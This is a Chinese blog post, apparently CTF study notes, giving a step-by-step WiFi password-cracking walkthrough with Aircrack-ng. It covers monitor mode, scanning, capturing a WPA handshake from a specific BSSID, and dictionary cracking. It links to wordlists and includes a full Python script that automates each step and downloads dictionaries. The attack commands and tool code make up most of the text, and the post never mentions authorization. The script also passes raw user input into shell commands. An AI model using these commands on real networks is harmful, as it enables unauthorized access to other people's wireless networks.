CTF学习笔记（大学篇）04 —— 使用Aircrack-ng来破解WIFI

1725 字

9 分钟

CTF学习笔记（大学篇）04 —— 使用Aircrack-ng来破解WIFI

2022-06-01

CTF

/

WIFI

/

aircrack

{% note info %}

Aircrack-ng 官网：https://www.aircrack-ng.org/

{% endnote %}

Aircrack-ng是用来破解WIFI密码的工具，原理就是先寻找要破解的WIFI，然后把设备T下线，伪装成热点，让其他设备连接到伪装热点上获取握手包，最后跑字典把密码跑出来

说白了就是字典里面如果有就是有，没有那就没戏，所以其实用处嘛……

Aircrack-Ng 安装#

Kali其实自带了这个东西，但是对于大部分的Linux发行版是不带的，所以我们需要进行安装

最简单的方式就是直接通过apt进行安装

1
sudo apt update
2
sudo apt install aircrack-ng -y

我这里因为装过了所以才是这么提示的，如果没装过会进入正常的apt安装流程

网卡设置#

我这里自己插了一张AWUS036H网卡（显示为wlan0），某宝从几十块到几百的都有，那我这张自然是白嫖的嘛

顺带上一张实物图

要开始使用Aircrack-ng，就需要把网卡设置为监听模式，不过这个设置Aircrack-ng里面有一键化的命令，我们只需要执行

1
sudo airmon-ng start <网卡名字>

就可以打开监听模式了，对于我这里，我需要输入的为

1
sudo airmon-ng start wlan0

（我这里因为开过一次，所以就会有两个进程在用这个网卡，根据它里面所说的用airmon-ng check kill先杀掉相关进程后重新开启就可以了）

完成后，原网卡的名字后面会多出mon的字样，就像这样

搜索网络#

使用airodump-ng <网卡名字>可以进入搜索模式

1
sudo airodump-ng wlan0mon

然后会开始搜索附近的WIFI，按两下Q可以退出搜索

BSSID 是搜索到的WIFI的MAC地址

PWR 不清楚，但是用不到

Beacons 不清楚，但是也用不到

#Data, #/s 数据量（我猜的）

CH 即Channel，WIFI的频道

MB 不清楚，也用不到

ENC CIPHER 加密协议的版本

AUTH 认证方式（PSK即密码）

ESSID WIFI名称

我们需要记下BSSID CHANNEL 这两个东西，在抓取握手包会用到，记完了以后按两下Q退出搜索就可以了

抓取握手包#

使用airodump-ng -w {path} --channel {channel} --bssid {bssid} {netcard}能够抓取握手包

path就是保存文件的路径

channel 频道，上面说过了

bssid WIFI的MAC地址，上面也说过了

netcard 你想使用的网卡

我这里就直接输入下面这个命令来抓取Raspberry这个WIFI的握手包（Packets文件夹已经提前新建完成）

1
sudo airodump-ng -w ./Packets/captured --channel 11 --bssid 5E:E4:2A:0D:4B:75 wlan0mon

网卡会进入抓取模式，这个过程可以按两下Q退出抓取

需要注意的是，抓取过程中，其他设备必须与该WIFI进行至少一次的连接（从不在该网络连接到该网络）

抓完后，会出现如图的这些文件

我们要用来破解的就是这个captured-01.cap，至于为什么有01，因为aircrack-ng怕你重名，所以在文件后面会加上数字

破解WIFI密码#

使用命令aircrack-ng {path} -w {dictionary}来破解WIFI密码

path 是要破解的cap文件的后缀，我这里就应该填./Packets/captured-01.cap

dictionary 是要用来破解WIFI跑的字典（字典可以访问代码浏览 - WIFI - 常用字典 - GamerNoTitle的团队 (coding.net)获取）

组合起来，我这里输入命令（wpa.txt是我电脑里面已经存在的字典）

1
sudo aircrack-ng ./Packets/captured-01.cap -w wpa.txt

然后就会开始跑字典，跑完了就会显示了（我这里没有跑，因为太慢了）

一键化Python程序#

需要记住这么多命令是不是很烦，这里我自己做了个Aircrack-ng的Python程序，来避免记这么多的程序。需要注意：这个程序只能在Linux上运行，并且需要以root权限运行（因为aircrack的大部分命令都需要root权限）

下面贴出程序，你也可以通过CTF-Scripts/WlanCrack.py at master · GamerNoTitle/CTF-Scripts (github.com)获取。本程序在字典方面跟我上面的那个coding的库进行了链接，如果没有提供字典的话可以从coding库下载

需要安装的Python轮子：requests tqdm pprint

1
import os
2
import requests
3
from pprint import pformat
4
from tqdm import tqdm
5

6
PreviousOutput = None
7
output = None
8
ListeningMode = False
9
PreviousPath = None
10

11

12
def ShowNetCard():
13
    output = os.popen('ifconfig')
14
    data = output.read()
15
    print(data)
16
    return data
17

18

19
def StartListenerMode(netcard):
20
    os.system('airmon-ng check kill')
21
    os.system(f'airmon-ng start {netcard}')
22
    global ListeningMode
23
    ListeningMode = True
24
    print('Started')
25

26

27
def DumpStatus(NetCard):
28
    print('Double-press Q to exit. When you are ready, press enter.')
29
    input()
30
    os.system(f'airodump-ng {NetCard}')
31

32

33
def CapturePacket(channel: int, bssid: str, netcard: str, path='./captured'):
34
    print('Double-press Q to exit. When you are ready, press enter.')
35
    input()
36
    os.system(
37
        f'airodump-ng -w {path} --channel {channel} --bssid {bssid} {netcard}')
38

39

40
def CrackWithDict(path, dictionary):
41
    os.system('airmon-ng check kill')
42
    os.system(f'aircrack-ng {path} -w {dictionary}')
43

44

45
def Downloader(url: str, filename: str):
46
    resp = requests.get(url, stream=True)
47
    total = int(resp.headers.get('content-length', 0))
48
    with open(filename, 'wb') as file, tqdm(
49
        desc=filename,
50
        total=total,
51
        unit='iB',
52
        unit_scale=True,
53
        unit_divisor=1024,
54
    ) as bar:
55
        for data in resp.iter_content(chunk_size=1024):
56
            size = file.write(data)
57
            bar.update(size)
58

59

60
help_msg = '''{:=^80}
61
[0] Show netcards
62
[1] Start listener
63
[2] Dump wlan status
64
[3] Capture heartbeat packet
65
[4] Crack the packet with a dictionary
66
[9] Install aircrack-ng (If you haven\'t install it on your computer)
67
[q] Exit
68
{:=^80}
69
'''.format(' Aircrack-Ng Script ', ' Made by GamerNoTitle ')
70

71
LogoPrint = r'''           _                         _           _   _          _____           _       _
72
     /\   (_)                       | |         | \ | |        / ____|         (_)     | |
73
    /  \   _ _ __ ___ _ __ __ _  ___| | ________|  \| | __ _  | (___   ___ _ __ _ _ __ | |_
74
   / /\ \ | | '__/ __| '__/ _` |/ __| |/ /______| . ` |/ _` |  \___ \ / __| '__| | '_ \| __|
75
  / ____ \| | | | (__| | | (_| | (__|   <       | |\  | (_| |  ____) | (__| |  | | |_) | |_
76
 /_/    \_\_|_|  \___|_|  \__,_|\___|_|\_\      |_| \_|\__, | |_____/ \___|_|  |_| .__/ \__|
77
                                                        __/ |                    | |
78
                                                       |___/                     |_|        -- GamerNoTitle '''
79

80
if __name__ == '__main__':
81
    print(LogoPrint)
82
    if os.geteuid() != 0:
83
        print('You need to run it as root!')
84
        os._exit(0)
85
    while True:
86
        print(help_msg)
87
        Input = input('Please choose an option: ')
88
        if Input == '0':
89
            CardsInfo = ShowNetCard()
90
        if Input == '1':
91
            Netcard = input(
92
                'Please type the netcard\'s name that you wanna use: ')
93
            if 'wlan' not in Netcard:
94
                print(f'Unsupported netcard! {Netcard}')
95
            else:
96
                StartListenerMode(Netcard)
97
        if Input == '2':
98
            if ListeningMode:
99
                Netcard = input(
100
                    'Please type the netcard\'s name that you wanna use: ')
101
                NetCards = CardsInfo.split('\n\n')
102
                if 'wlan' not in Netcard:
103
                    print(f'Unsupported netcard! {Netcard}')
104
                else:
105
                    HaveCard = False
106
                    for i in NetCards:
107
                        if Netcard in i:
108
                            HaveCard = True
109
                    if HaveCard:
110
                        DumpStatus(Netcard)
111
                    else:
112
                        print(
113
                            f'Unable to find netcard {Netcard} in {NetCards}')
114
            else:
115
                print('You need to start the listener first!')
116
        if Input == '3':
117
            path = input(
118
                'Please input the path that you want to save the file (e.g: ./captured): ')
119
            PreviousPath = path
120
            channel = int(
121
                input('Please input the channel that you want to listen to: '))
122
            bssid = input('Please input the bssid you want to listen to: ')
123
            netcard = input('Please input the netcard you want to use: ')
124
            if path == '' or channel == '' or bssid == '' or netcard == '':
125
                print('Invalid parameters!')
126
            else:
127
                CapturePacket(channel=channel, bssid=bssid,
128
                              netcard=netcard, path=path)
129
        if Input == '4':
130
            path = input(
131
                f'Please input the file you want to crack (Default for the previous file {PreviousPath}): ')
132
            if path == '':
133
                path = PreviousPath
134
            dictionary = input(
135
                'Please input the dictionary that you want to use to crack: ')
136
            if dictionary == '':
137
                print('You haven\'t specify a dictionary to crack the packet! Do you need some dictionarys? The avaliable dictionarys are listed below: ')
138
                dictionarys = requests.get(
139
                    'https://gamernotitle.coding.net/p/Dictionarys/d/WIFI/git/raw/master/metadata.json?download=true').json()
140
                print(pformat(dictionarys))
141
                option = input(
142
                    'Please input the name of the dictionary you want to use: ')
143
                if option == '':
144
                    print('You need to specify a dictionary to crack the packet!')
145
                else:
146
                    Downloader(dictionarys['data'][option]
147
                               ['link'], f'./{option}.txt')
148
                    dictionary = f'{option}.txt'
149
                    print(
150
                        f'Start cracking {path} with dictionary {dictionary}')
151
                    CrackWithDict(path, dictionary)
152
            else:
153
                print(f'Start cracking {path} with dictionary {dictionary}')
154
                CrackWithDict(path, dictionary)
155
        if Input == '9':
156
            os.system('apt update')
157
            os.system('apt install aircrack-ng -y')
158
        if Input == 'q':
159
            os._exit(0)